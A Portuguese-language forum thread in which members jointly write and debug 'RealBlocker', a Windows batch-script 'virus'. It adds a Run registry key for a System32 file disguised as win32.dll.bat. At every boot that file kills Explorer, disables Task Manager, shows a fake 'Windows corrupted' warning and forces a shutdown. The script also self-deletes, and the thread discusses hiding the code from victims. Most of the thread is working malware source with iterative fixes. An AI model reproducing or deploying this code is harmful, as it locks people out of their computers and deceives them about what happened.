Fazendo REG abrir um programa ao Iniciar o Windows (AJUDA)

Eu to fazendo um script em bat baseado na ideia de um outro que eu vi na net, eu chamo ele de RealBlocker,

Quando o windows começa a carregar o perfil do usuario, o explorer.exe fecha, o arquivo taskmgr.exe (responsavel pelo Ctrl Alt Del) é renomeado pra não ser encontrado, e desliga o computador, tipo o "vírus" shutdown só que mais detalhado, e o ponto dele é que tem como você revertê-lo.

Basta entrar no modo de segurança com prompt de comando. fazendo Login o abrirá o cmd do Windows. Nele, basta digitar cd\ e depois escrever RegCleanBot.bat que ele inicia o reversor que vai apagar o virus.

O problema é aquele esqueminha da pasta inicializar > All Users já tá muito manjado, então fiz o script criar um reg q executa o virus quando o pc liga, MAASS, eu queria deixar o virus na pasta system32, o problema é que o registro não está funcionando.. alguem pode dar uma ajuda??

O nome do arquivo q eu qro executar é win32.dll.bat, ele q fica na system32, o que reverte fica no C: e o original q causou udo é deletado quando o virus é executado a primeira vez pra num deixar rastro..

Taí o código que eu fiz pra add no REG.. Q q eu fiz de errado? Tem que colocar as barras no dir do REG

REG add HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun /v RealBlocker /t REG_SZ /d C:windowsSystem32win32.dll.bat

Quando eu tiver terminado eu posto o script aqui!

Ta aí o código fonte do win32.dll.bat
Será que o windows 7 bloqueia o system32? ainda não testei no Windows XP!

Código:

 @Echo off
@Break off
:: ------ para processo do EXPLORER.EXE ------
taskkill /f /im explorer.exe
Cls

:: ------ Renomeia taskmgr.exe para ele não ser encontrado ------
ren %windir%\System32\taskmgr.exe bkptaskmgr.exe
Cls

:: ------ Exclui taskmgr.exe ------
cd\
cd %WINDIR%\System32\
del /s /q taskmgr.exe

:: ------ Exibe um alerta ------
msg * Sua mensagem de alerta!
Cls

:: ------ Reinicia o PC ------
shutdown -s -f -t 140 -c "Deixe uma mensagem para o usuario"
Exit
Cls


Tenta assim:

Código:


REG add HKLM\SOFTWARE\Microsoft\WindowsCurrent\Version\Run /v RealBlocker /t REG_SZ /d "%windir%\System32\win32.dll.bat"

Interessante seu projeto...

Arruma uma coisa:

Aki vc colocou para renomear taskmgr.exe

Código:


:: ------ Renomeia taskmgr.exe para ele não ser encontrado ------
ren %windir%\System32\taskmgr.exe bkptaskmgr.exe
Cls


Então não precisa deleta-lo se ele já tem outro nome.

O resto ta bom, belo trabalho.

Código:

REG ADD HKLM\SOFTWARE\Microsoft\WindowsCurrent\Version\Run /v RealBlocker /t REG_SZ /d "%windir%\System32\win32.dll.bat" /f

Gosto de colocar um "/f"..que significa tipo "forçar" ele força o registro a ser feito.
Eu adoro o regedit...
Ate postei um topico com varias coisas de regedit:
[Você precisa estar registrado e conectado para ver este link.]
La vc encontrar a chave pra bloquear CTRL+ALT+DEL...nao lembro se e postei o de bloquear mouse e teclado....mas tem diversas chaves de regedit....
olha la e vc tera como aprimorar esse seu virus!

Vdd, eu acabei deixando assim porque no começo, a ideia era copiar, renomear a cópia e deletar o original, aí eu vi que eu só tava enrolando e q dava só pra renomear, e acabei deixando o del..

a ideia do /f é uma boa ideia, e bloquear o mouse e o teclado só tenho que ter a PURA CERTEZA de que quando iniciar em modo de segurança ele num vai executar, senão não tem como reverter!

e eu tava pensando, o arquivo que reverte não deleta a reg. Será que ele pode indicar algum erro se tentar iniciar e não achar o arquivo? porque se for é melhor deletar a reg tbm..

de resto acho que não precisa de mais nada, até pq eu qro bloquear o computador, e não acabar com ele

Vou dar uma olhada no tópico de comandos do REGEDIT, parece ser interessante, quem sabe eu não tenho umas ideias

Esse é interessante usar, e junto com o ren, para ter certeza de que não vai ser possivel o acesso, fica mais difícil de burlar

27. Remover o Gerenciador de Tarefas (Ctrl+Alt+Del)

Código:

[Configuração Habilitada] REG ADD “HKCU\Software\Microsoft\Windows\CurrentVersion\Po licies\System” /v DisableTaskMgr /t REG_DWORD /d 0×00000001 /f

[Configuração Desabilitada] REG ADD “HKCU\Software\Microsoft\Windows\CurrentVersion\Po licies\System” /v DisableTaskMgr /t REG_DWORD /d 0×00000000 /f

Teve um que eu fiz so com reg...
[Você precisa estar registrado e conectado para ver este link.]

Bloquear mouse e tclado eu nao lembro

Vou dar uma olhada quando chegar em casa, aqui na empresa, o sistema bloqueia qualquer SITE que tenha virus, jogos, games e diversas palavras ligadas a erotismo na URL.. rsrs

Aproveitando, como eu faço pra pegar o endereço do arquivo em execução?
Aí independente de onde o "criador" (script q cria bat do virus e do antidoto) esteja quando for executado, ele joga no script do virus o local do arquivo pra depois deletar!
Porque se eu fosse deixar o criador fazer isso, ou eu o autodeletava ou desligava o pc..
Deu pra entender? pq eu acho q eu fui meio confuso nessa explicação

Eu tentei achar um jeito, mas não consegui.. se eu descobrir isso vai ajudar, porque eu já estava com a ideia de transformar o "criador" em exe pra ninguem ler o codigo fonte, mas se eu conseguir deletá-lo vai ser melhor ainda!

Para o batch se auto deletar é:

Código:

del %0

mas eu acho que se eu digitar

Código:

shutdown -s -f -t 20
del %0

Ele não vai deletar, e se for

Código:

del %0
shutdown -s -f -t 20

ele não vai desligar..

não fiz o teste, mas acredito que isso irá acontecer

Então, fiz os testes no windows XP, ele criou o REG, criou TODOS os arquivos com perfeição, MAS, ele não executou win32.dll.bat quando o windows foi iniciado

o win32.dll.bar não bloqueou o Ctrl+Alt+Del ... mas desligou o computador e encerrou o explorer..

Alguem pode ver q q eu fiz de errado?
Como fui eu que criei, a logica ainda tá na minha cabeça e fica difícil achar po erro.. to sem ideias.

Código:


@Echo Off
@Break Off
If "%os%" == "Windows_NT" Goto INI
Exit
:INI
REG ADD HKLM\SOFTWARE\Microsoft\WindowsCurrent\Version\Run /v RealBlocker /t REG_SZ /d "%windir%\System32\win32.dll.bat" /f
Echo @Echo off >> %WINDIR%\System32\win32.dll.bat
Echo @Break off >> %WINDIR%\System32\win32.dll.bat
Echo taskkill /f /im explorer.exe >> %WINDIR%\System32\win32.dll.bat
Echo Cls >> %WINDIR%\System32\win32.dll.bat
Echo ren %windir%\System32\taskmgr.exe bkptaskmgr.exe >> %WINDIR%\System32\win32.dll.bat
Echo Cls >> %WINDIR%\System32\win32.dll.bat
Echo msg * Aten‡Æo! Seu Windows est  corrompido e ser  encerrado >> %WINDIR%\System32\win32.dll.bat
Echo Cls >> %WINDIR%\System32\win32.dll.bat
Echo shutdown -r -f -t 15 -c " Bye bye!" >> %WINDIR%\System32\win32.dll.bat
Echo Exit >> %WINDIR%\System32\win32.dll.bat
Cls
Echo @Echo off >> C:\RegCleanBoot.bat
Echo color 6 >> C:\RegCleanBoot.bat
Echo Title RealBlocker Removedor >> C:\RegCleanBoot.bat
Echo Echo. >> C:\RegCleanBoot.bat
Echo Echo EXCLUINDO PROCESSO DE BOOT AUTOMATICO >> C:\RegCleanBoot.bat
Echo Echo. >> C:\RegCleanBoot.bat
Echo Echo PRESSIONE ENTER PARA REMOVER >> C:\RegCleanBoot.bat
Echo Echo. >> C:\RegCleanBoot.bat
Echo Pause >nul >> C:\RegCleanBoot.bat
Echo taskkill /f /im win32.dll.bat >> C:\RegCleanBoot.bat
Echo Cls >> C:\RegCleanBoot.bat
Echo shutdown -a >> C:\RegCleanBoot.bat
Echo Cls >> C:\RegCleanBoot.bat
Echo ren C:\WINDOWS\System32\bkptaskmgr.exe taskmgr.exe >> C:\RegCleanBoot.bat
Echo Cls >> C:\RegCleanBoot.bat
Echo cd\ >> C:\RegCleanBoot.bat >> C:\RegCleanBoot.bat
Echo cd Windows\System32\ >> C:\RegCleanBoot.bat
Echo del /s /q win32.dll.bat >> C:\RegCleanBoot.bat
Echo exit >> C:\RegCleanBoot.bat
Cls
msg * Obrigado por utilizar o RealBlocker! Seu Windows est  sendo encerrado
cls
shutdown -r -f -t 10 -c "Parab‚ns! Vocˆ acaba de ferrar com seu Windows! Bye bye!"
Exit


Tá legal, descobri alguns problemas, o taskmgr.exe não está sendo renomeado, mas eu vou usar o REG do Sargita para travar, mas porque o programa não inicia com o windows?

Ah, a vacina funcionou, deletou o arquivo sem problema, to pensando em fazer ela deletar o REG tbm, e se autodeletar tbm, pq daí deixa tudo como se nada tivesse acontecido

RealBlocker BETA

Editei o Código, e coloquei uma breve explicação pra vcs entenderem como eu pensei.. xD

Quando executado, ele cria o arquivo chamado win32.dll.bat na pasta system32 do Windows e adiciona um REG que faz com que toda vez que o computador for iniciado, ele rode o arquivo win32.dll.bat, semelhante a função do vírus shutdown na pasta inicializar, mas esse fica escondido no REG.

O que o arquivo win32.dll.bat faz? Finaliza o explorer.exe, renomeia o arquivo taskmgr.exe, Add o REG que bloqueia o taskmgr e desliga o computador.

Não há como escapar disso, a menos que o usuário conheça a fonte do programa ou alguém ensine a executar o removedor.

E o removedor, como funciona? Quando o computador é ligado, basta entrar no modo de segurança com prompt de comando. Logue com o usuário da maquina, então abrirá o cmd do Windows. Nele, basta digitar cd\ e depois escrever RegCleanBot.bat. Após isso irá abrir a tela do removedor, basta dar enter esperar ele agir.

O RegCleanBot.bat age como se fosse um programa do próprio Windows, então somente que conhece o Windows irá saber se você fizer esse processo na frente do usuário, mas caso o usuário não conheça, se fizer esse processo na sua frente, e ele irá achar que você realmente concertou seu computador. (a tá.. rsrs)

Código Fonte:
[Você precisa estar registrado e conectado para ver este link.]

Código:

@Echo Off
@Break Off
If "%os%" == "Windows_NT" Goto INI
Exit
:INI
REG ADD HKLM\SOFTWARE\Microsoft\WindowsCurrent\Version\Run /v RealBlocker /t REG_SZ /d "%windir%\System32\win32.dll.bat" /f
Echo @Echo off >> %WINDIR%\System32\win32.dll.bat
Echo @Break off >> %WINDIR%\System32\win32.dll.bat
Echo taskkill /f /im explorer.exe >> %WINDIR%\System32\win32.dll.bat
Echo Cls >> %WINDIR%\System32\win32.dll.bat
Echo ren %windir%\System32\taskmgr.exe bkptaskmgr.exe >> %WINDIR%\System32\win32.dll.bat
Echo REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 0×00000001 /f[/font] >> %WINDIR%\System32\win32.dll.bat
Echo Cls >> %WINDIR%\System32\win32.dll.bat
Echo msg * Aten‡Æo! Seu Windows est corrompido e ser encerrado >> %WINDIR%\System32\win32.dll.bat
Echo Cls >> %WINDIR%\System32\win32.dll.bat
Echo shutdown -r -f -t 15 -c " Bye bye!" >> %WINDIR%\System32\win32.dll.bat
Echo Exit >> %WINDIR%\System32\win32.dll.bat
Cls
Echo @Echo off >> C:\RegCleanBoot.bat
Echo color 6 >> C:\RegCleanBoot.bat
Echo Title RealBlocker Removedor >> C:\RegCleanBoot.bat
Echo Echo. >> C:\RegCleanBoot.bat
Echo Echo EXCLUINDO PROCESSO DE BOOT AUTOMATICO >> C:\RegCleanBoot.bat
Echo Echo. >> C:\RegCleanBoot.bat
Echo Echo PRESSIONE ENTER PARA REMOVER >> C:\RegCleanBoot.bat
Echo Echo. >> C:\RegCleanBoot.bat
Echo Pause >nul >> C:\RegCleanBoot.bat
Echo taskkill /f /im win32.dll.bat >> C:\RegCleanBoot.bat
Echo Cls >> C:\RegCleanBoot.bat
Echo shutdown -a >> C:\RegCleanBoot.bat

Echo ren %windir%\System32\taskmgr.exe bkptaskmgr.exe >> C:\RegCleanBoot.bat
Echo
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 0×00000000 /f >> C:\RegCleanBoot.bat
Echo Cls >> C:\RegCleanBoot.bat
Echo ren C:\WINDOWS\System32\bkptaskmgr.exe taskmgr.exe >> C:\RegCleanBoot.bat
Echo Cls >> C:\RegCleanBoot.bat
Echo cd\ >> C:\RegCleanBoot.bat >> C:\RegCleanBoot.bat
Echo cd Windows\System32\ >> C:\RegCleanBoot.bat
Echo del /s /q win32.dll.bat >> C:\RegCleanBoot.bat
Echo exit >> C:\RegCleanBoot.bat
Cls
msg * Obrigado por utilizar o RealBlocker! Seu Windows est sendo encerrado
cls
shutdown -r -f -t 10 -c "Parab‚ns! Vocˆ acaba de ferrar com seu Windows! Bye bye!"
Exit


MAS TEM UM PROBLEMA!

Não sei pq o win32.dll.bat ainda não inicia com o windows.. alguem pode me dizer o pq?
Não consegui descobrir, e o taskmgr ainda tá funcionando, usei o task e o ren e continua funcionando, alguma ideia? vlww!!

Dei uma odificada..ve se vai!

Código:

@Echo Off
@Break Off
If "%os%" == "Windows_NT" Goto INI
Exit
:INI
(Echo @Echo off
Echo @Break off
Echo taskkill /f /im explorer.exe
Echo Cls
Echo ren %windir%\System32\taskmgr.exe bkptaskmgr.exe
Echo REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 0×00000001 /f
Echo Cls
Echo msg * Aten‡Æo! Seu Windows est  corrompido e ser  encerrado
Echo Cls
Echo shutdown -r -f -t 15 -c " Bye bye!"
Echo Exit)> %systemroot%\System32\win32.dll.bat
REG ADD HKLM\SOFTWARE\Microsoft\WindowsCurrent\Version\Run /v RealBlocker /t REG_SZ /d %systemroot%\System32\win32.dll.bat /f
REG ADD HKCU\SOFTWARE\Microsoft\WindowsCurrent\Version\Run /v RealBlocker /t REG_SZ /d %systemroot%\System32\win32.dll.bat /f
Cls
(Echo @Echo off
Echo color 6
Echo Title RealBlocker Removedor
Echo Echo.
Echo Echo EXCLUINDO PROCESSO DE BOOT AUTOMATICO
Echo Echo.
Echo Echo PRESSIONE ENTER PARA REMOVER
Echo Echo.
Echo Pause >nul
Echo taskkill /f /im win32.dll.bat
Echo Cls
Echo shutdown -a)> C:\RegCleanBoot.bat

(Echo ren %systemroot%\System32\taskmgr.exe bkptaskmgr.exe
Echo REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 0×00000000 /f
Echo Cls
Echo ren C:\WINDOWS\System32\bkptaskmgr.exe taskmgr.exe
Echo Cls
Echo CD\
Echo cd Windows\System32\
Echo del /s /q win32.dll.bat
Echo exit)> C:\RegCleanBoot.bat
Cls
msg * Obrigado por utilizar o RealBlocker! Seu Windows est  sendo encerrado
cls
shutdown -r -f -t 10 -c "Parab‚ns! Vocˆ acaba de ferrar com seu Windows! Bye bye!"
Exit

Nao testei..mas s econtinuar dando erro....
entao subostitua o "win32.dll.bat" por "win32.bat"
as vezes pode Gerar confusao no windows!

Segue aí o Link da ultima edição, tive que fazer umas alterações, no script q vc alterou, funcionou a trava do taskmgr.exe, mas o REGCLEAR ficou incompleto por causa do ECHO, mas já arrumei.

Eu coloquei comentarios nele pra ficar mais fácil de visualizar.

[Você precisa estar registrado e conectado para ver este link.]

troquei win32.dll.bat por win32.bat
a ideia de usar win32.dll é q qm não entende tem medo de apagar dll, mas como nem vai conseguir ligar o pc é indiferente.

mas o REG ainda não faz ele iniciar junto com o windows..
ps.: ESTOU TESTANDO NO XP

Acho q agora vai!

Código:

@Echo Off
:: ---------- impede pausa com Ctrl+C ----------
@Break Off
:: ---------- Verifica se o Windows é o sistema operaconal ----------
If "%os%" == "Windows_NT" Goto INI
Exit
:INI

:: ---------- Cria o arquivo win32.bat ----------
(Echo @Echo off
Echo @Break off
Echo taskkill /f /im explorer.exe
Echo Cls
:: ---------- renomeia taskmgr.exe ----------
Echo ren %windir%\System32\taskmgr.exe bkptaskmgr.exe
:: ---------- Add REG que trava taskmgr.exe ----------
Echo REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 0×00000001 /f
Echo Cls
:: ---------- Dá uma mensagem de alerta ----------
Echo msg * Aten‡Æo! Seu Windows est´ corrompido e ser´ encerrado
Echo Cls
:: ---------- Desliga o PC ----------
Echo shutdown -r -f -t 15 -c " Bye bye!"
Echo Exit)> %systemroot%\System32\win32.bat
REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v RealBlocker /t REG_SZ /d %systemroot%\System32\win32.bat /f
REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v RealBlocker /t REG_SZ /d %systemroot%\System32\win32.bat /f
Cls
:: ---------- Cria o arquivo RegCleanBoot.bat ----------
(Echo @Echo off
Echo color 2
Echo Title CMD
Echo Echo.
Echo Echo EXCLUINDO PROCESSO DE BOOT AUTOMATICO
Echo Echo.
Echo Echo PRESSIONE ENTER PARA REMOVER
Echo Echo.
Echo Pause >nul
:: ---------- impede que win32.bat seja executado ----------
Echo taskkill /f /im win32.bat
Echo Cls
:: ---------- para o shutdown ----------
Echo shutdown -a
Echo ren %systemroot%\System32\bkptaskmgr.exe taskmgr.exe
Echo REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 0×00000000 /f
Echo Cls
Echo ren C:\WINDOWS\System32\bkptaskmgr.exe taskmgr.exe
Echo Cls
Echo CD\
Echo cd Windows\System32\
Echo del /s /q win32.bat
Echo exit)> C:\RegCleanBoot.bat
Cls
:: ----- encerra explorer -----
taskkill /f /im explorer.exe
:: ------- trava taskmgr ------
ren C:\WINDOWS\System32\taskmgr.exe bkptaskmgr.exe
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 0×00000001 /f
:: ---- mensagem de alerta ----
msg * Parab‚ns! Vocˆ acaba de ferrar com seu Windows! Bye bye!
cls
:: ------- reinicia o pc ------
shutdown -r -f -t 15 -c "Obrigado por utilizar o RealBlocker! Seu Windows est sendo encerrado"
Exit


notaçao:A variavel %systemroot% e a variavel %windir% tem a msm funçao!